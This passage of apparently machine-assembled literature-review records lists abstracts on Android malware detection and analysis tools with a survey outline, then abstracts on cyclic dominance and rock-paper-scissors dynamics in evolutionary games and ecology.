algorithms for retargeting Android applications received from markets to Java class files. The resulting Dare tool uses a new intermediate representation to enable fast and accurate retargeting. Dare further applies strong constraint solving to infer typing information and translates the 257 DVM opcodes using only 9 translation rules. It also handles cases where the input Dalvik bytecode is unverifiable. We evaluate Dare on 1,100 of the top applications found in the free section of the Android market and successfully retarget 99.99% of the 262,110 associated classes. Further, whereas existing tools can only fully retarget about half of these applications, Dare can recover over 99% of them. In this way, we open the door to users, developers and markets to use the vast array of program analysis tools to ensure the correct operation of Android applications. --- paper_title: Dexpler: Converting Android Dalvik Bytecode to Jimple for Static Analysis with Soot paper_content: This paper introduces Dexpler, a software package which converts Dalvik bytecode to Jimple. Dexpler is built on top of Dedexer and Soot. As Jimple is Soot's main internal representation of code, the Dalvik bytecode can be manipulated with any Jimple based tool, for instance for performing point-to or flow analysis. --- paper_title: A survey on automated dynamic malware-analysis techniques and tools paper_content: Anti-virus vendors are confronted with a multitude of potentially malicious samples today. Receiving thousands of new samples every day is not uncommon. The signatures that detect confirmed malicious threats are mainly still created manually, so it is important to discriminate between samples that pose a new unknown threat and those that are mere variants of known malware. This survey article provides an overview of techniques based on dynamic analysis that are used to analyze potentially malicious samples. It also covers analysis programs that leverage these It also covers analysis programs that employ these techniques to assist human analysts in assessing, in a timely and appropriate manner, whether a given sample deserves closer manual inspection due to its unknown malicious behavior. --- paper_title: “Andromaly”: a behavioral malware detection framework for android devices paper_content: This article presents Andromaly--a framework for detecting malware on Android mobile devices. The proposed framework realizes a Host-based Malware Detection System that continuously monitors various features and events obtained from the mobile device and then applies Machine Learning anomaly detectors to classify the collected data as normal (benign) or abnormal (malicious). Since no malicious applications are yet available for Android, we developed four malicious applications, and evaluated Andromaly's ability to detect new malware based on samples of known malware. We evaluated several combinations of anomaly detection algorithms, feature selection method and the number of top features in order to find the combination that yields the best performance in detecting new malware on Android. Empirical results suggest that the proposed framework is effective in detecting malware on mobile devices in general and on Android in particular. --- paper_title: AntiMalDroid: An Efficient SVM-Based Malware Detection Framework for Android paper_content: Mobile handsets, especially smartphones, are becoming more open and general-purpose, thus they also become attack targets of malware. Threat of malicious software has become an important factor in the safety of smartphones. Android is the most popular open-source smartphone operating system and its permission declaration access control mechanisms can’t detect the behavior of malware. In this work, AntiMalDroid, a software behavior signature based malware detection framework using SVM algorithm is proposed, AntiMalDroid can detect malicious software and there variants effectively in runtime and extend malware characteristics database dynamically. Experimental results show that the approach has high detection rate and low rate of false positive and false negative, the power and performance impact on the original system can also be ignored. --- paper_title: Crowdroid: behavior-based malware detection system for Android paper_content: The sharp increase in the number of smartphones on the market, with the Android platform posed to becoming a market leader makes the need for malware analysis on this platform an urgent issue. In this paper we capitalize on earlier approaches for dynamic analysis of application behavior as a means for detecting malware in the Android platform. The detector is embedded in a overall framework for collection of traces from an unlimited number of real users based on crowdsourcing. Our framework has been demonstrated by analyzing the data collected in the central server using two types of data sets: those from artificial malware created for test purposes, and those from real malware found in the wild. The method is shown to be an effective means of isolating the malware and alerting the users of a downloaded malware. This shows the potential for avoiding the spreading of a detected malware to a larger community. --- paper_title: TaintDroid: An Information-Flow Tracking System for Realtime Privacy Monitoring on Smartphones paper_content: Today's smartphone operating systems frequently fail to provide users with adequate control over and visibility into how third-party applications use their private data. We address these shortcomings with TaintDroid, an efficient, system-wide dynamic taint tracking and analysis system capable of simultaneously tracking multiple sources of sensitive data. TaintDroid provides realtime analysis by leveraging Android's virtualized execution environment. TaintDroid incurs only 14% performance overhead on a CPU-bound micro-benchmark and imposes negligible overhead on interactive third-party applications. Using TaintDroid to monitor the behavior of 30 popular third-party Android applications, we found 68 instances of potential misuse of users' private information across 20 applications. Monitoring sensitive data with TaintDroid provides informed use of third-party applications for phone users and valuable input for smartphone security service firms seeking to identify misbehaving applications. --- paper_title: DroidScope: Seamlessly Reconstructing the OS and Dalvik Semantic Views for Dynamic Android Malware Analysis paper_content: The prevalence of mobile platforms, the large market share of Android, plus the openness of the Android Market makes it a hot target for malware attacks. Once a malware sample has been identified, it is critical to quickly reveal its malicious intent and inner workings. In this paper we present DroidScope, an Android analysis platform that continues the tradition of virtualization-based malware analysis. Unlike current desktop malware analysis platforms, DroidScope reconstructs both the OS-level and Java-level semantics simultaneously and seamlessly. To facilitate custom analysis, DroidScope exports three tiered APIs that mirror the three levels of an Android device: hardware, OS and Dalvik Virtual Machine. On top of DroidScope, we further developed several analysis tools to collect detailed native and Dalvik instruction traces, profile API-level activity, and track information leakage through both the Java and native components using taint analysis. These tools have proven to be effective in analyzing real world malware samples and incur reasonably low performance overheads. --- paper_title: An Overview of Mobile Malware and Solutions paper_content: Mobile Security has been a rapidly growing field in the security area. With the increases of mobile devices and mobile applications, the need for mobile security has increased dramatically over the past several years. Many research and development projects on mobile security are ongoing in government, industry and academia. In this paper, we present an analysis of current mobile security problems and propose the possible solutions to malware threats. Our experiments show antimalware can protect mobile device from different types of mobile malware threats effectively. --- paper_title: An Android Application Sandbox system for suspicious software detection paper_content: Smartphones are steadily gaining popularity, creating new application areas as their capabilities increase in terms of computational power, sensors and communication. Emerging new features of mobile devices give opportunity to new threats. Android is one of the newer operating systems targeting smartphones. While being based on a Linux kernel, Android has unique properties and specific limitations due to its mobile nature. This makes it harder to detect and react upon malware attacks if using conventional techniques. In this paper, we propose an Android Application Sandbox (AASandbox) which is able to perform both static and dynamic analysis on Android programs to automatically detect suspicious applications. Static analysis scans the software for malicious patterns without installing it. Dynamic analysis executes the application in a fully isolated environment, i.e. sandbox, which intervenes and logs low-level interactions with the system for further analysis. Both the sandbox and the detection algorithms can be deployed in the cloud, providing a fast and distributed detection of suspicious software in a mobile software store akin to Google's Android Market. Additionally, AASandbox might be used to improve the efficiency of classical anti-virus applications available for the Android operating system. ---
Title: Android Malware Detection & Protection: A Survey Section 1: INTRODUCTION Description 1: Introduce the significance of Android OS, its popularity, and the rising threats from malware, emphasizing the necessity of robust malware detection and protection mechanisms. Section 2: ANDROID MALWARE ANALYSIS Description 2: Categorize and describe the various types of malware targeting Android devices, including Trojans, Backdoors, Worms, Spyware, Botnets, Ransomwares, and Riskwares. Section 3: MALWARE PENETRATION TECHNIQUES Description 3: Examine the different techniques used by attackers to penetrate Android devices, such as repackaging, drive-by downloads, dynamic payloads, and stealth malware techniques. Section 4: MALWARE DETECTION APPROACHES Description 4: Provide an analysis of the methods used for malware detection on Android, including both static and dynamic approaches, and evaluate their effectiveness and limitations. Section 5: PERFORMANCE EVALUATION & ANALYSIS Description 5: Assess the performance of various malware detection techniques, comparing static and dynamic approaches and discussing their respective advantages and limitations in depth. Section 6: FUTURE TRENDS AND HYBRID SOLUTIONS Description 6: Predict future trends in Android market shares and malware growth, and propose hybrid solutions combining static and dynamic analysis to provide better security mechanisms. Section 7: CONCLUSION Description 7: Summarize the findings of the survey, emphasizing the need for a hybrid solution for effective malware detection and outlining future work plans to develop and implement such solutions.
Cyclic dominance in evolutionary games: A review
13
--- paper_title: Resolving social dilemmas on evolving random networks paper_content: We show that strategy-independent adaptations of random interaction networks can induce powerful mechanisms, ranging from the Red Queen to group selection, which promote cooperation in evolutionary social dilemmas. These two mechanisms emerge spontaneously as dynamical processes due to deletions and additions of links, which are performed whenever players adopt new strategies and after a certain number of game iterations, respectively. The potency of cooperation promotion, as well as the mechanism responsible for it, can thereby be tuned via a single parameter determining the frequency of link additions. We thus demonstrate that coevolving random networks may evoke an appropriate mechanism for each social dilemma, such that cooperation prevails even in highly unfavorable conditions. --- paper_title: Rock–scissors–paper and the survival of the weakest paper_content: In the children9s game of rock–scissors–paper, players each choose one of three strategies. A rock beats a pair of scissors, scissors beat a sheet of paper and paper beats a rock, so the strategies form a competitive cycle. Although cycles in competitive ability appear to be reasonably rare among terrestrial plants, they are common among marine sessile organisms and have been reported in other contexts. Here we consider a system with three species in a competitive loop and show that this simple ecology exhibits two counter–intuitive phenomena. First, the species that is least competitive is expected to have the largest population and, where there are oscillations in a finite population, to be the least likely to die out. As a consequence an apparent weakening of a species leads to an increase in its population. Second, evolution favours the most competitive individuals within a species, which leads to a decline in its population. This is analogous to the tragedy of the commons, but here, rather than leading to a collapse, the ‘tragedy’ acts to maintain diversity. --- paper_title: Chemical Warfare Among Invaders: A Detoxification Interaction Facilitates an Ant Invasion paper_content: As tawny crazy ants ( Nylanderia fulva ) invade the southern USA, they often displace imported fire ants ( Solenopsis invicta ). Following exposure to S. invicta venom, N. fulva applies abdominal exocrine gland secretions to its cuticle. Bioassays reveal that these secretions detoxify S. invicta venom. Further, formic acid, from N. fulva venom, is the detoxifying agent. N. fulva exhibits this detoxification behavior after conflict with a variety of ant species; however, it expresses it most intensely after interactions with S. invicta . This behavior may have evolved in their shared South American native range. The unique capacity to detoxify a major competitor’s venom likely contributes substantially to its ability to displace S. invicta populations, making this behavior a causative agent in the ecological transformation of regional arthropod assemblages. --- paper_title: Evolutionary conservation of species' roles in food webs. paper_content: Studies of ecological networks (the web of interactions between species in a community) demonstrate an intricate link between a community's structure and its long-term viability. It remains unclear, however, how much a community's persistence depends on the identities of the species present, or how much the role played by each species varies as a function of the community in which it is found. We measured species' roles by studying how species are embedded within the overall network and the subsequent dynamic implications. Using data from 32 empirical food webs, we find that species' roles and dynamic importance are inherent species attributes and can be extrapolated across communities on the basis of taxonomic classification alone. Our results illustrate the variability of roles across species and communities and the relative importance of distinct species groups when attempting to conserve ecological communities. --- paper_title: A synthetic oscillatory network of transcriptional regulators paper_content: Networks of interacting biomolecules carry out many essential functions in living cells, but the 'design principles' underlying the functioning of such intracellular networks remain poorly understood, despite intensive efforts including quantitative analysis of relatively simple systems. Here we present a complementary approach to this problem: the design and construction of a synthetic network to implement a particular function. We used three transcriptional repressor systems that are not part of any natural biological clock to build an oscillating network, termed the repressilator, in Escherichia coli. The network periodically induces the synthesis of green fluorescent protein as a readout of its state in individual cells. The resulting oscillations, with typical periods of hours, are slower than the cell-division cycle, so the state of the oscillator has to be transmitted from generation to generation. This artificial clock displays noisy behaviour, possibly because of stochastic fluctuations of its components. Such 'rational network design may lead both to the engineering of new cellular behaviours and to an improved understanding of naturally occurring networks. --- paper_title: Labyrinthine clustering in a spatial rock-paper-scissors ecosystem paper_content: The spatial rock-paper-scissors ecosystem, where three species interact cyclically, is a model example of how spatial structure can maintain biodiversity. We here consider such a system for a broad range of interaction rates. When one species grows very slowly, this species and its prey dominate the system by self-organizing into a labyrinthine configuration in which the third species propagates. The cluster size distributions of the two dominating species have heavy tails and the configuration is stabilized through a complex spatial feedback loop. We introduce a statistical measure that quantifies the amount of clustering in the spatial system by comparison with its mean-field approximation. Hereby, we are able to quantitatively explain how the labyrinthine configuration slows down the dynamics and stabilizes the system. --- paper_title: Evolutionary game theory: Temporal and spatial effects beyond replicator dynamics paper_content: Evolutionary game dynamics is one of the most fruitful frameworks for studying evolution in different disciplines, from Biology to Economics. Within this context, the approach of choice for many researchers is the so-called replicator equation, that describes mathematically the idea that those individuals performing better have more offspring and thus their frequency in the population grows. While very many interesting results have been obtained with this equation in the three decades elapsed since it was first proposed, it is important to realize the limits of its applicability. One particularly relevant issue in this respect is that of non-mean-field effects, that may arise from temporal fluctuations or from spatial correlations, both neglected in the replicator equation. This review discusses these temporal and spatial effects focusing on the non-trivial modifications they induce when compared to the outcome of replicator dynamics. Alongside this question, the hypothesis of linearity and its relation to the choice of the rule for strategy update is also analyzed. The discussion is presented in terms of the emergence of cooperation, as one of the current key problems in Biology and in other disciplines. --- paper_title: Mobility promotes and jeopardizes biodiversity in rock-paper-scissors games paper_content: Biodiversity is essential to the viability of ecological systems. Species diversity in ecosystems is promoted by cyclic, non-hierarchical interactions among competing populations. Such non-transitive relations lead to an evolution with central features represented by the `rock-paper-scissors' game, where rock crushes scissors, scissors cut paper, and paper wraps rock. In combination with spatial dispersal of static populations, this type of competition results in the stable coexistence of all species and the long-term maintenance of biodiversity. However, population mobility is a central feature of real ecosystems: animals migrate, bacteria run and tumble. Here, we observe a critical influence of mobility on species diversity. When mobility exceeds a certain value, biodiversity is jeopardized and lost. In contrast, below this critical threshold all subpopulations coexist and an entanglement of travelling spiral waves forms in the course of temporal evolution. We establish that this phenomenon is robust, it does not depend on the details of cyclic competition or spatial environment. These findings have important implications for maintenance and evolution of ecological systems and are relevant for the formation and propagation of patterns in excitable media, such as chemical kinetics or epidemic outbreaks. --- paper_title: Zero-one survival behavior of cyclically competing species paper_content: The coexistence of competing species is, due to unavoidable fluctuations, always transient. In this Letter, we investigate the ultimate survival probabilities characterizing different species in cyclic competition. We show that they often obey a surprisingly simple, though nontrivial behavior. Within a model where coexistence is neutrally stable, we demonstrate a robust zero-one law: When the interactions between the three species are (generically) asymmetric, the "weakest" species survives at a probability that tends to one for large population sizes, while the other two are guaranteed to extinction. We rationalize our findings from stochastic simulations by an analytic approach. --- paper_title: Evolutionary dynamics of group interactions on structured populations: A review paper_content: Interactions among living organisms, from bacteria colonies to human societies, are inherently more complex than interactions among particles and non-living matter. Group interactions are a particularly important and widespread class, representative of which is the public goods game. In addition, methods of statistical physics have proved valuable for studying pattern formation, equilibrium selection and self-organization in evolutionary games. Here, we review recent advances in the study of evolutionary dynamics of group interactions on top of structured populations, including lattices, complex networks and coevolutionary models. We also compare these results with those obtained on well-mixed populations. The review particularly highlights that the study of the dynamics of group interactions, like several other important equilibrium and non-equilibrium dynamical processes in biological, economical and social sciences, benefits from the synergy between statistical physics, network science and evolutionary game theory. --- paper_title: The rock–paper–scissors game and the evolution of alternative male strategies paper_content: MANY species exhibit colour polymorphisms associated with alternative male reproductive strategies, including territorial males and 'sneaker males' that behave and look like females1–3. The prevalence of multiple morphs is a challenge to evolutionary theory because a single strategy should prevail unless morphs have exactly equal fitness4,5 or a fitness advantage when rare6,7. We report here the application of an evolutionary stable strategy model to a three-morph mating system in the side-blotched lizard. Using parameter estimates from field data, the model predicted oscillations in morph frequency, and the frequencies of the three male morphs were found to oscillate over a six-year period in the field. The fitnesses of each morph relative to other morphs were non-transitive in that each morph could invade another morph when rare, but was itself invadable by another morph when common. Concordance between frequency-dependent selection and the among-year changes in morph fitnesses suggest that male interactions drive a dynamic 'rock–paper–scissors' game7. --- paper_title: Costs for switching partners reduce network dynamics but not cooperative behaviour paper_content: Social networks represent the structuring of interactions between group members. Above all, many interactions are profoundly cooperative in humans and other animals. In accordance with this natural observation, theoretical work demonstrates that certain network structures favour the evolution of cooperation. Yet, recent experimental evidence suggests that static networks do not enhance cooperative behaviour in humans. By contrast, dynamic networks do foster cooperation. However, costs associated with dynamism such as time or resource investments in finding and establishing new partnerships have been neglected so far. Here, we show that human participants are much less likely to break links when costs arise for building new links. Especially, when costs were high, the network was nearly static. Surprisingly, cooperation levels in Prisoner's Dilemma games were not affected by reduced dynamism in social networks. We conclude that the mere potential to quit collaborations is sufficient in humans to reach high levels of cooperative behaviour. Effects of self-structuring processes or assortment on the network played a minor role: participants simply adjusted their cooperative behaviour in response to the threats of losing a partner or of being expelled. --- paper_title: Complex Competitive Relationships Among Genotypes of Three Perennial Grasses: Implications for Species Coexistence paper_content: Competitive relationships were studied among genotypes of Agropyron repens, Poa pratensis, and Phleum pratense collected from a grassland community in southeastern Ontario. Field surveys revealed no significant correlations of abundance among the three species within randomly placed survey plots. The greater performance of target plants in removal plots versus control plots for all three species in a vegetation-removal experiment, however, suggests that each of these three species was suppressed by competitive interactions in the field. One clone (genotype) of each species was collected from each of 10 sites (7-cm2 neighborhoods) within the community. Each genotype was propagated vegetatively and grown in the greenhouse in monocultures and in pairwise mixtures with all other genotypes collected from the community. Differences in relative competitive ability among species or genotypes were measured as significant differences between the yield-suppression coefficients of the two components of a mixture. A s... --- paper_title: Competing associations in six-species predator-prey models paper_content: We study a set of six-species ecological models where each species has two predators and two prey. On a square lattice the time evolution is governed by iterated invasions between the neighbouring predator–prey pairs chosen at random and by a site exchange with a probability Xs between the neutral pairs. These models involve the possibility of spontaneous formation of different defensive alliances whose members protect each other from the external invaders. The Monte Carlo simulations show a surprisingly rich variety of the stable spatial distributions of species and subsequent phase transitions when tuning the control parameter Xs. These very simple models are able to demonstrate that the competition between these associations influences their composition. Sometimes the dominant association is developed via a domain growth. In other cases larger and larger invasion processes precede the prevalence of one of the stable associations. Under some conditions the survival of all the species can be maintained by the cyclic dominance occurring between these associations. --- paper_title: Local dispersal promotes biodiversity in a real-life game of rock–paper–scissors paper_content: One of the central aims of ecology is to identify mechanisms that maintain biodiversity. Numerous theoretical models have shown that competing species can coexist if ecological processes such as dispersal, movement, and interaction occur over small spatial scales. In particular, this may be the case for non-transitive communities, that is, those without strict competitive hierarchies. The classic non-transitive system involves a community of three competing species satisfying a relationship similar to the children's game rock-paper-scissors, where rock crushes scissors, scissors cuts paper, and paper covers rock. Such relationships have been demonstrated in several natural systems. Some models predict that local interaction and dispersal are sufficient to ensure coexistence of all three species in such a community, whereas diversity is lost when ecological processes occur over larger scales. Here, we test these predictions empirically using a non-transitive model community containing three populations of Escherichia coli. We find that diversity is rapidly lost in our experimental community when dispersal and interaction occur over relatively large spatial scales, whereas all populations coexist when ecological processes are localized. --- paper_title: Volunteering leads to rock–paper–scissors dynamics in a public goods game paper_content: Collective efforts are a trademark of both insect and human societies1. They are achieved through relatedness in the former2 and unknown mechanisms in the latter. The problem of achieving cooperation among non-kin has been described as the ‘tragedy of the commons’, prophesying the inescapable collapse of many human enterprises3,4. In public goods experiments, initial cooperation usually drops quickly to almost zero5. It can be maintained by the opportunity to punish defectors6 or the need to maintain good reputation7. Both schemes require that defectors are identified. Theorists propose that a simple but effective mechanism operates under full anonymity. With optional participation in the public goods game, ‘loners’ (players who do not join the group), defectors and cooperators will coexist through rock–paper–scissors dynamics8,9. Here we show experimentally that volunteering generates these dynamics in public goods games and that manipulating initial conditions can produce each predicted direction. If, by manipulating displayed decisions, it is pretended that defectors have the highest frequency, loners soon become most frequent, as do cooperators after loners and defectors after cooperators. On average, cooperation is perpetuated at a substantial level. --- paper_title: Spatial organization in cyclic Lotka-Volterra systems paper_content: We study the evolution of a system of $N$ interacting species which mimics the dynamics of a cyclic food chain. On a one-dimensional lattice with N<5 species, spatial inhomogeneities develop spontaneously in initially homogeneous systems. The arising spatial patterns form a mosaic of single-species domains with algebraically growing size, $\ell(t)\sim t^\alpha$, where $\alpha=3/4$ (1/2) and 1/3 for N=3 with sequential (parallel) dynamics and N=4, respectively. The domain distribution also exhibits a self-similar spatial structure which is characterized by an additional length scale, ${\cal L}(t)\sim t^\beta$, with $\beta=1$ and 2/3 for N=3 and 4, respectively. For $N\geq 5$, the system quickly reaches a frozen state with non interacting neighboring species. We investigate the time distribution of the number of mutations of a site using scaling arguments as well as an exact solution for N=3. Some possible extensions of the system are analyzed. --- paper_title: Fixation in a cyclic Lotka-Volterra model paper_content: We study a cyclic Lotka-Volterra model of N interacting species populating a d-dimensional lattice. In the realm of a Kirkwood approximation, a critical number of species N_c(d) above which the system fixates is determined analytically. We find N_c=5,14,23 in dimensions d=1,2,3, in remarkably good agreement with simulation results in two dimensions. --- paper_title: Effects of punishment in a mobile population playing the prisoner's dilemma game paper_content: We deal with a system of prisoner's dilemma players undergoing continuous motion in a two-dimensional plane. In contrast to previous work, we introduce altruistic punishment after the game. We find punishing only a few of the cooperator-defector interactions is enough to lead the system to a cooperative state in environments where otherwise defection would take over the population. This happens even with soft nonsocial punishment (where both cooperators and defectors punish other players, a behavior observed in many human populations). For high enough mobilities or temptations to defect, low rates of social punishment can no longer avoid the breakdown of cooperation. --- paper_title: Dynamically generated cyclic dominance in spatial prisoner's dilemma games paper_content: We have studied the impact of time-dependent learning capacities of players in the framework of spatial prisoner's dilemma game. In our model, this capacity of players may decrease or increase in time after strategy adoption according to a step-like function. We investigated both possibilities separately and observed significantly different mechanisms that form the stationary pattern of the system. The time decreasing learning activity helps cooperator domains to recover the possible intrude of defectors hence supports cooperation. In the other case the temporary restrained learning activity generates a cyclic dominance between defector and cooperator strategies, which helps to maintain the diversity of strategies via propagating waves. The results are robust and remain valid by changing payoff values, interaction graphs or functions characterizing time-dependence of learning activity. Our observations suggest that dynamically generated mechanisms may offer alternative ways to keep cooperators alive even at very larger temptation to defect. --- paper_title: Testosterone, Endurance, and Darwinian Fitness: Natural and Sexual Selection on the Physiological Bases of Alternative Male Behaviors in Side-Blotched Lizards paper_content: The mechanistic bases of natural and sexual selection on physiological and behavioral traits were examined in male morphs of three colors of the side-blotched lizard, Uta stansburiana. Orange-throated males are aggressive and defend large territories with many females. Blue-throated males defend smaller territories with fewer females; however, blue-throated males assiduously mate guard females on their territory. Yellow-throated males do not defend a territory, but patrol a large home range. They obtain secretive copulations from females on the territories of dominant males. Males with bright orange throats had higher levels of plasma testosterone (T), endurance, activity, and home range size and concomitantly gained greater control over female home ranges than blue- or yellow-throated males. Experimentally elevating plasma T in yellow- and blue-throated males increased their endurance, activity, home range size, and control over female territories to levels that were seen in unmanipulated orange-throated males that had naturally high plasma T. However, the enhanced performance of orange-throated males is not without costs. Orange-throated males had low survival compared to the other morphs. Finally, some yellow-throated males transformed to a partial blue morphology late in the season and the endurance of these transforming yellow-throated males increased from early to late in the season. In addition, yellow-throated males that transformed to blue also had significantly higher plasma T late in the season compared to the plasma T earlier in the season. T appears to play an important role in the physiological changes that all three color morphs undergo during the process of maturation. In some yellow males, T plays an additional role in plastic changes in behavior and physiology late in the reproductive season. We discuss natural and sexual selection on physiological and behavioral traits that leads to the evolution of steroid regulation in the context of alternative male strategies. --- paper_title: Reward and cooperation in the spatial public goods game paper_content: The promise of punishment and reward in promoting public cooperation is debatable. While punishment is traditionally considered more successful than reward, the fact that the cost of punishment frequently fails to offset gains from enhanced cooperation has lead some to reconsider reward as the main catalyst behind collaborative efforts. Here we elaborate on the"stick versus carrot"dilemma by studying the evolution of cooperation in the spatial public goods game, where besides the traditional cooperators and defectors, rewarding cooperators supplement the array of possible strategies. The latter are willing to reward cooperative actions at a personal cost, thus effectively downgrading pure cooperators to second-order free-riders due to their unwillingness to bear these additional costs. Consequently, we find that defection remains viable, especially if the rewarding is costly. Rewards, however, can promote cooperation, especially if the synergetic effects of cooperation are low. Surprisingly, moderate rewards may promote cooperation better than high rewards, which is due to the spontaneous emergence of cyclic dominance between the three strategies. --- paper_title: Evolutionary establishment of moral and double moral standards through spatial interactions paper_content: Situations where individuals have to contribute to joint efforts or share scarce resources are ubiquitous. Yet, without proper mechanisms to ensure cooperation, the evolutionary pressure to maximize individual success tends to create a tragedy of the commons (such as over-fishing or the destruction of our environment). This contribution addresses a number of related puzzles of human behavior with an evolutionary game theoretical approach as it has been successfully used to explain the behavior of other biological species many times, from bacteria to vertebrates. Our agent-based model distinguishes individuals applying four different behavioral strategies: non-cooperative individuals ("defectors"), cooperative individuals abstaining from punishment efforts (called "cooperators" or "second-order free-riders"), cooperators who punish non-cooperative behavior ("moralists"), and defectors, who punish other defectors despite being non-cooperative themselves ("immoralists"). By considering spatial interactions with neighboring individuals, our model reveals several interesting effects: First, moralists can fully eliminate cooperators. This spreading of punishing behavior requires a segregation of behavioral strategies and solves the "second-order free-rider problem". Second, the system behavior changes its character significantly even after very long times ("who laughs last laughs best effect"). Third, the presence of a number of defectors can largely accelerate the victory of moralists over non-punishing cooperators. Fourth, in order to succeed, moralists may profit from immoralists in a way that appears like an "unholy collaboration". Our findings suggest that the consideration of punishment strategies allows one to understand the establishment and spreading of "moral behavior" by means of game-theoretical concepts. This demonstrates that quantitative biological modeling approaches are powerful even in domains that have been addressed with non-mathematical concepts so far. The complex dynamics of certain social behaviors become understandable as the result of an evolutionary competition between different behavioral strategies. --- paper_title: When does cyclic dominance lead to stable spiral waves? paper_content: Species diversity in ecosystems is often accompanied by the self-organisation of the population into fascinating spatio-temporal patterns. Here, we consider a two-dimensional three-species population model and study the spiralling patterns arising from the combined effects of generic cyclic dominance, mutation, pair-exchange and hopping of the individuals. The dynamics is characterised by nonlinear mobility and a Hopf bifurcation around which the system's phase diagram is inferred from the underlying complex Ginzburg-Landau equation derived using a perturbative multiscale expansion. While the dynamics is generally characterised by spiralling patterns, we show that spiral waves are stable in only one of the four phases. Furthermore, we characterise a phase where nonlinearity leads to the annihilation of spirals and to the spatially uniform dominance of each species in turn. Away from the Hopf bifurcation, when the coexistence fixed point is unstable, the spiralling patterns are also affected by nonlinear diffusion. --- paper_title: Cellular Automaton Models of Interspecific Competition for Space--The Effect of Pattern on Process paper_content: Species in plant communities generally shown an aggregated distribution at one or more spatial scales. This, and the fact that competition between sessile organisms occurs chiefly between neighbours, suggests that the spatial configuration of plants should affect the process and outcome of interspecific competition. Cellular automaton models were constructed to simulate the competitive interaction of five grass species, Agrostis stolonifera, Holcus lanatus, Cynosurus cristatus, Poa trivialis and Lolium perenne, based on experimentally determined rates of invasion. A model with a random initial starting arrangement showed a very rapid loss of species compared to initial arrangements in which species occurred in monospecific bands (...) --- paper_title: Antibiotic-mediated antagonism leads to a bacterial game of rock–paper–scissors in vivo paper_content: Colicins are narrow-spectrum antibiotics produced by and active against Escherichia coli and its close relatives. Colicin-producing strains cannot coexist with sensitive or resistant strains in a well-mixed culture, yet all three phenotypes are recovered in natural populations1. Recent in vitro results conclude that strain diversity can be promoted by colicin production in a spatially structured, non-transitive interaction2, as in the classic non-transitive model rock–paper–scissors (RPS). In the colicin version of the RPS model, strains that produce colicins (C) kill sensitive (S) strains, which outcompete resistant (R) strains, which outcompete C strains. Pairwise in vitro competitions between these three strains are resolved in a predictable order (C beats S, S beats R, and R beats C), but the complete system of three strains presents the opportunity for dynamic equilibrium2. Here we provide conclusive evidence of an in vivo antagonistic role for colicins and show that colicins (and potentially other bacteriocins) may promote, rather than eliminate, microbial diversity in the environment. --- paper_title: Reward and punishment paper_content: Minigames capturing the essence of Public Goods experiments show that even in the absence of rationality assumptions, both punishment and reward will fail to bring about prosocial behavior. This result holds in particular for the well-known Ultimatum Game, which emerges as a special case. But reputation can induce fairness and cooperation in populations adapting through learning or imitation. Indeed, the inclusion of reputation effects in the corresponding dynamical models leads to the evolution of economically productive behavior, with agents contributing to the public good and either punishing those who do not or rewarding those who do. Reward and punishment correspond to two types of bifurcation with intriguing complementarity. The analysis suggests that reputation is essential for fostering social behavior among selfish agents, and that it is considerably more effective with punishment than with reward. --- paper_title: Phase diagrams for the spatial public goods game with pool-punishment paper_content: The efficiency of institutionalized punishment is studied by evaluating the stationary states in the spatial public goods game comprising unconditional defectors, cooperators, and cooperating pool punishers as the three competing strategies. Fines and costs of pool punishment are considered as the two main parameters determining the stationary distributions of strategies on the square lattice. Each player collects a payoff from five five-person public goods games, and the evolution of strategies is subsequently governed by imitation based on pairwise comparisons at a low level of noise. The impact of pool punishment on the evolution of cooperation in structured populations is significantly different from that reported previously for peer punishment. Representative phase diagrams reveal remarkably rich behavior, depending also on the value of the synergy factor that characterizes the efficiency of investments payed into the common pool. Besides traditional single- and two-strategy stationary states, a rock-paper-scissors type of cyclic dominance can emerge in strikingly different ways. --- paper_title: Coevolutionary Dynamics: From Finite to Infinite Populations paper_content: Traditionally, frequency dependent evolutionary dynamics is described by deterministic replicator dynamics assuming implicitly infinite population sizes. Only recently have stochastic processes been introduced to study evolutionary dynamics in finite populations. However, the relationship between deterministic and stochastic approaches remained unclear. Here we solve this problem by explicitly considering large populations. In particular, we identify different microscopic stochastic processes that lead to the standard or the adjusted replicator dynamics. Moreover, differences on the individual level can lead to qualitatively different dynamics in asymmetric conflicts and, depending on the population size, can even invert the direction of the evolutionary process. --- paper_title: Cyclic dominance and biodiversity in well-mixed populations paper_content: Coevolutionary dynamics is investigated in chemical catalysis, biological evolution, social and economic systems. The dynamics of these systems can be analyzed within the unifying framework of evolutionary game theory. In this Letter, we show that even in well-mixed finite populations, where the dynamics is inherently stochastic, biodiversity is possible with three cyclic-dominant strategies. We show how the interplay of evolutionary dynamics, discreteness of the population, and the nature of the interactions influences the coexistence of strategies. We calculate a critical population size above which coexistence is likely. --- paper_title: Interfaces with internal structures in generalized rock-paper-scissors models paper_content: In this work we investigate the development of stable dynamical structures along interfaces separating domains belonging to enemy partnerships, in the context of cyclic predator-prey models with an even number of species $N \ge 8$. We use both stochastic and field theory simulations in one and two spatial dimensions, as well as analytical arguments, to describe the association at the interfaces of mutually neutral individuals belonging to enemy partnerships and to probe their role in the development of the dynamical structures at the interfaces. We identify an interesting behaviour associated to the symmetric or asymmetric evolution of the interface profiles depending on whether $N/2$ is odd or even, respectively. We also show that the macroscopic evolution of the interface network is not very sensitive internal structure of the interfaces. Although this work focus on cyclic predator prey-models with an even number of species, we argue that the results are expected to be quite generic in the context of spatial stochastic May-Leonard models. --- paper_title: Coexistence versus extinction in the stochastic cyclic Lotka-Volterra model paper_content: Cyclic dominance of species has been identified as a potential mechanism to maintain biodiversity, see, e.g., B. Kerr, M. A. Riley, M. W. Feldman and B. J. M. Bohannan Nature 418, 171 (2002)] and B. Kirkup and M. A. Riley Nature 428, 412 (2004)]. Through analytical methods supported by numerical simulations, we address this issue by studying the properties of a paradigmatic non-spatial three-species stochastic system, namely, the "rock-paper-scissors" or cyclic Lotka-Volterra model. While the deterministic approach (rate equations) predicts the coexistence of the species resulting in regular (yet neutrally stable) oscillations of the population densities, we demonstrate that fluctuations arising in the system with a finite number of agents drastically alter this picture and are responsible for extinction: After long enough time, two of the three species die out. As main findings we provide analytic estimates and numerical computation of the extinction probability at a given time. We also discuss the implications of our results for a broad class of competing population systems. --- paper_title: Coaction versus reciprocity in continuous-time models of cooperation. paper_content: Cooperating animals frequently show closely coordinated behaviours organized by a continuous flow of information between interacting partners. Such real-time coaction is not captured by the iterated prisoner's dilemma and other discrete-time reciprocal cooperation games, which inherently feature a delay in information exchange. Here, we study the evolution of cooperation when individuals can dynamically respond to each other's actions. We develop continuous-time analogues of iterated-game models and describe their dynamics in terms of two variables, the propensity of 